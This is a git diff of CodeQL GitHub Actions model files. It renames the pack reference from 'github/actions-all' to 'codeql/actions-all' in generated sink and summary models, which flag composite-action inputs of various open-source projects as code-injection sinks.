b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml index bba69dfc7a0e..04246517883e 100644 --- a/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/infracost_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["infracost/actions", "*", "input.behavior", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml index 0fbc67e2b1ba..2dd758bbccb5 100644 --- a/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml +++ b/ql/lib/ext/generated/composite-actions/inspektor-gadget_inspektor-gadget.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["inspektor-gadget/inspektor-gadget", "*", "input.runtime", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml index 6c6a4264d51f..5764bab2ebb9 100644 --- a/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml +++ b/ql/lib/ext/generated/composite-actions/intel-analytics_ipex-llm.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["intel-analytics/ipex-llm", "*", "input.extra-dependency", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index ee18012a8f54..bbf2f0dc3dea 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 3dc390527074..de80b5607d86 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index b98826b9f021..ce748cd8fc92 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index d000c5eb4d51..ae43fb8964db 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index 409ef9564d35..06f888fdecfa 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index 60a79604580c..170505a19019 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] @@ -21,7 +21,7 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.application-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index 4effdea078e3..3bc3b24cba85 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index d2c44be62611..9ac0e61a0289 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 098782a6bef4..2b22333ba027 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index e08f4ba9bc24..5277000b2735 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 973264531584..e596c90c79dc 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 8f6c13884c5c..226fab0382b9 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f7f2f139e85c..892cd78749be 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 11b423e871c6..f7bd2567ec81 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 954b2d05858f..126bf5c28d78 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 6cdb74f12782..9ce67a2592d4 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index e6820c900e3e..11e82c1bf249 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index ba3ad6e8b0c9..06418a823ebe 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 114b8ce168e2..f2d07bc848d0 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 834353d89a82..e1e80cb9eb6f 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 1c903d71cbef..8a8760c9bf67 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index c34200337f2d..9374557b62a3 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index 19d14bbe9889..5a27009da98f 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index 0308c934d7e3..6ca81714510b 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 6039a6c36285..0bd932956056 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 4962f4f6281f..896c7ab520ae 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 91c9e22df2ae..50bfce009b08 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 760858b7eece..8cbaa9ccc744 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 8d219108234c..e25e7fd7560c 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index e889a394563f..d1228eb3df96 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 8f96daba8df1..b987ca6683bc 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 1e73f98b3d3c..20060fa74459 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index c92eb434d475..297b47a3ff53 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 9de3892ac0ca..16a0386beabc 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 2ae0b823187b..37556bcb99d9 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 8e2744b2de75..9532f50714ef 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index bf2e23efba83..465b4145aebe 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index d8d865913021..b607b57693cc 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 1ac30a3790e9..76243ecd6006 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 1c05276abe0e..68c5a0b4b69d 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index c4b67ad5c580..2cf57246d0c4 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a4400dde9d4b..9f62363e1692 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 8b5566b4996d..0dfbad39abea 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 349f66f4387a..eb76e7d7a452 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index f717bf5c5d8a..7672a6aadbbc 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index b2a851a0dbab..041705b1f558 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 054af41f284c..b80d135bfb3a 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 31eeed0d2516..2e6fc133dd9a 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index 97adf115bd2e..710cd7951619 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 926230e2282f..e64c87b9e073 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index 0827f770e31d..2d663b075be4 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: github/actions-all + pack: codeql/actions-all extensible: actionsSinkModel 